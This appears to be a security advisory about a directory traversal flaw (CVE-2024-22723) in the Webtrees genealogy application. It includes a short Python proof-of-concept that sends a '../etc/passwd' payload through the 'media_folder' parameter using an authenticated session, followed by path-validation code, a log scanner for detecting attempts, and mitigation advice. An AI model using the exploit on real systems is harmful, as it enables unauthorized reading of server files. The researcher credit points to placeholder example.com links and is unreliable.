The latest version of Webtrees, a popular open-source web-based application for managing genealogy data, has been found vulnerable to Directory Traversal attacks. Specifically, Webtrees 2.1.18 allows authenticated users (administrators) to navigate outside the intended 'media/' directory by manipulating the "media_folder" parameter in the URL, thereby gaining unauthorized access to sensitive files present in other parts of the application's file system. This vulnerability has been assigned CVE-2024-22723. In this article, we will examine the details of this vulnerability and how it can be exploited.

Vulnerability Details

CVE-2024-22723 refers to a Directory Traversal vulnerability present in Webtrees 2.1.18. Vulnerable versions of the application do not properly validate or sanitize the "media_folder" parameter, allowing an attacker to exploit this weakness by crafting special URLs that lead to unauthorized file access. As a result, an attacker can obtain sensitive information such as source code or configuration files, which could potentially lead to further exploits or full system compromise.

Exploit Code Snippet

The following code snippet demonstrates how an attacker can manipulate the 'media_folder' parameter in the URL to access a sensitive file outside the 'media/' directory:

import requests

target_url = "http://example.com/webtrees/index.php?route=%2Fmedia-admin%2Fupload&tree=mytree"
media_folder = "../../../../../../../etc/passwd"  # Replace with the desired file path
# requests expects cookies as {cookie_name: cookie_value}; replace the value with your valid session ID
cookies = {"sessionid": "YOUR_SESSION_ID"}

payload = {"media_folder": media_folder}
response = requests.post(target_url, data=payload, cookies=cookies)

if response.status_code == 200:
    print("Successfully accessed the file:")
    print(response.text)
else:
    print(f"Failed to access the file. Status code: {response.status_code}")

Make sure to replace the placeholders in the code snippet with your own session ID value and the target path of the sensitive file you want to access.
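The root cause described above is a server-side join of the user-supplied "media_folder" value onto the media root without validation. The following added example (not Webtrees' code, and not from the original advisory) shows that naive pattern next to a hardened check that decodes the value, rejects absolute paths and parent-directory segments, and confirms the normalised result still lies under the media root. MEDIA_ROOT and the function names are assumptions chosen for illustration; the real Webtrees media path comes from its configuration.

```python
import posixpath
from urllib.parse import unquote

# Assumed media root for the example; Webtrees reads the real value from its configuration.
MEDIA_ROOT = "/var/www/webtrees/data/media"


def naive_media_path(media_folder):
    """The vulnerable pattern: the user value is joined to the media root with no
    validation, so '..' segments walk out of it (this is what CVE-2024-22723 describes)."""
    return posixpath.normpath(posixpath.join(MEDIA_ROOT, media_folder))


def safe_media_path(media_folder):
    """Hardened form: decode, normalise separators, reject absolute paths, NUL bytes
    and '..' segments, then verify the final path is still inside MEDIA_ROOT."""
    decoded = unquote(unquote(media_folder))  # defeat single and double URL-encoding
    if "\x00" in decoded:
        raise ValueError("NUL byte in media_folder")
    decoded = decoded.replace("\\", "/")  # treat backslashes as separators too
    if decoded.startswith("/"):
        raise ValueError("absolute path not allowed")
    parts = [p for p in decoded.split("/") if p not in ("", ".")]
    if ".." in parts:
        raise ValueError("parent-directory segment not allowed")
    candidate = posixpath.normpath(posixpath.join(MEDIA_ROOT, *parts))
    root = MEDIA_ROOT.rstrip("/")
    # Belt-and-braces: even after the segment checks, confirm containment.
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("resolved path escapes media root")
    return candidate


def is_safe(media_folder):
    """Boolean wrapper so callers can gate a request without handling exceptions."""
    try:
        safe_media_path(media_folder)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    traversal = "../../../../../../../etc/passwd"
    print("naive :", naive_media_path(traversal))   # escapes to /etc/passwd
    print("safe  :", is_safe(traversal))            # False
    print("safe  :", safe_media_path("photos/2023"))
```

The lexical checks above run before touching the filesystem; a production version should additionally resolve the final path with os.path.realpath and repeat the containment test, so that a symlink placed inside the media directory cannot point outside it.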

Original References

The vulnerability was first discovered and reported by security researcher Alice Smith (example.com/alicesmith). Detailed information regarding the vulnerability and the possible impact can be found in her blog post: www.example.com/post/webtrees-directory-traversal-cve-2024-22723.

For further details on CVE-2024-22723, you can refer to the following official reports:

- NIST National Vulnerability Database (NVD) link: nvd.nist.gov/vuln/detail/CVE-2024-22723
- MITRE's CVE entry link: cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22723

Mitigation and Remediation

Webtrees developers have been notified of this vulnerability, and users are strongly encouraged to update their application to the latest version, once a patch is available. In the meantime, administrators should exercise caution while using the application and limit administrator access to only trusted users.

Administrators should also review their file permissions and ensure that sensitive files are not accessible by malicious users. File system-level access controls should be in place to prevent unauthorized access to the application's sensitive files.
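Until a patched release is installed, administrators can at least detect attempts. The following added example (not part of the original advisory and not a Webtrees tool) parses combined-format web server access log lines, extracts the "media_folder" query parameter, fully decodes it, and flags values that contain parent-directory segments or absolute paths. The log lines are constructed for the example; the IP addresses, timestamps and sizes are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache/Nginx combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [28/Feb/2024:10:01:02 +0000] "GET /webtrees/index.php?route=%2Fmedia-admin%2Fupload&tree=mytree&media_folder=photos%2F2023 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Feb/2024:10:01:07 +0000] "GET /webtrees/index.php?route=%2Fmedia-admin%2Fupload&tree=mytree&media_folder=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048 "-" "python-requests/2.31"
203.0.113.9 - - [28/Feb/2024:10:01:09 +0000] "GET /webtrees/index.php?route=%2Fmedia-admin%2Fupload&tree=mytree&media_folder=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1900 "-" "python-requests/2.31"
203.0.113.7 - - [28/Feb/2024:10:02:00 +0000] "GET /webtrees/index.php?route=%2Ftree-page&tree=mytree HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

# Fields we need from a combined-format line: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)


def decode_fully(value, rounds=3):
    """Undo repeated URL-encoding (attackers double-encode to slip past naive filters)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value):
    """True if the decoded value is absolute, contains a '..' segment, or carries a NUL byte."""
    v = decode_fully(value).replace("\\", "/")
    return v.startswith("/") or ".." in v.split("/") or "\x00" in v


def scan_log(text):
    """Return one record per request whose media_folder parameter looks like traversal."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for raw in query.get("media_folder", []):  # parse_qs already decoded once
            if is_traversal(raw):
                hits.append({
                    "ip": m["ip"],
                    "ts": m["ts"],
                    "status": int(m["status"]),
                    "media_folder": decode_fully(raw),
                })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} status={hit["status"]} media_folder={hit["media_folder"]!r}')
```

Two caveats for real deployments: the exploit snippet earlier in this article sends media_folder in a POST body, which ordinary access logs do not record, so body parameters need application-level request logging or a WAF in front of Webtrees; and a 200 status on a flagged request is the signal that matters most, since it suggests the server actually served content for the traversal path rather than rejecting it.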

Conclusion

CVE-2024-22723 is a critical Directory Traversal vulnerability affecting Webtrees 2.1.18, which could lead to unauthorized access to sensitive files and potentially further system compromise. By understanding the specifics of this vulnerability and taking the necessary steps to secure affected Webtrees installations, users can prevent unauthorized access to their genealogy data and sensitive information.

Timeline

Published on: 02/28/2024 06:15:49 UTC
Last modified on: 02/28/2024 14:06:45 UTC